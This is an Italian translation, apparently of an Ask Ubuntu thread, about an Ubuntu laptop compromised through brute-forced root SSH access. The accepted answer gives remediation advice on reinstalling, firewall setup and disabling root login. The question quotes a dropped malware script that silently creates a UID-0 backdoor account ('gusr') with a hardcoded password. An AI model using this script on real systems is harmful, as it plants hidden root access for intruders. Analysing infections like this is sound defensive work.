GNU/Linux >> Linux Esercitazione >  >> Ubuntu

Come gestire il malware sul laptop?

Sono abbastanza certo che il mio laptop Ubuntu 13.10 sia infetto da una sorta di malware.

Ogni tanto, trovo un processo /lib/sshd (di proprietà di root) che esegue e consuma molta CPU. Non è il server sshd che esegue /usr/sbin/sshd.

Il binario ha i permessi –wxrw-rwt e genera e genera script nella directory /lib. Uno recente si chiama 13959730401387633604 e fa quanto segue

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

L'utente gusr è stato creato dal malware in modo indipendente, quindi chpasswd si blocca consumando il 100% della CPU.

Finora, ho identificato che l'utente gusr è stato aggiunto anche ai file in /etc/

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Sembra che il malware abbia copiato tutti questi file con il suffisso "-". L'elenco completo dei file /etc/ che sono stati modificati da root è disponibile qui.

Inoltre, il file /etc/hosts è stato modificato in this.

/lib/sshd inizia aggiungendo se stesso alla fine del file /etc/init.d/rc.local!

Ho rimosso l'utente, rimosso i file, ucciso l'albero di elaborati, cambiato le mie password e rimosso le chiavi pubbliche ssh.

Sono consapevole di essere fondamentalmente fregato e molto probabilmente reinstallerò l'intero sistema. Tuttavia, dal momento che accedo a molte altre macchine, sarebbe bene almeno tentare di rimuoverlo e capire come l'ho ottenuto. Qualsiasi suggerimento su come procedere sarebbe apprezzato.

Sembra che siano entrati il ​​25 marzo con il login root forzato. Non avevo idea che root ssh fosse abilitato per impostazione predefinita in Ubuntu. L'ho disabilitato e ho inserito i negati host.

Il login proveniva da 59.188.247.236, a quanto pare da qualche parte a Hong Kong.

Ho ricevuto il laptop da EmperorLinux e hanno abilitato l'accesso come root. Se ne possiedi uno e stai eseguendo sshd, fai attenzione.

Risposta accettata:

Per prima cosa, togli subito quella macchina dalla rete!

In secondo luogo, perché hai abilitato l'account di root? Non dovresti davvero abilitare l'account root a meno che tu non abbia un'ottima ragione per farlo.

In terzo luogo, sì, l'unico modo per essere sicuri di essere pulito è eseguire un'installazione pulita. Si consiglia inoltre di ricominciare da capo e di non tornare a un backup, poiché non si può mai essere sicuri di quando tutto è iniziato.

Correlati:comando per determinare l'IP pubblico?

Ti suggerisco anche di configurare un firewall nella tua prossima installazione e negare tutte le connessioni in entrata:

sudo ufw default deny incoming

e quindi consenti ssh con:

sudo ufw allow ssh

e NON abilitare l'account root! Certamente assicurati che l'accesso root ssh sia disabilitato.


Ubuntu

  1. Linux:come trovare il driver (modulo) associato a un dispositivo su Linux?

  2. Come sincronizzare il root Gedit con le preferenze dell'utente Gedit?

  3. Come installare la stampante con Ubuntu?

  4. Come configurare ssh senza password con chiavi RSA

  5. Come trovare il driver (modulo) associato a un dispositivo su Linux?

Come modificare la password di root su Ubuntu 20.04

Come gestire in remoto il server Ubuntu con SSH

Come cambiare la password di root in Ubuntu

Come cambiare la directory principale del dominio primario con .htaccess?

Come reimpostare la password di root su Ubuntu 22.04

Come disabilitare l'accesso SSH per l'utente root in Linux?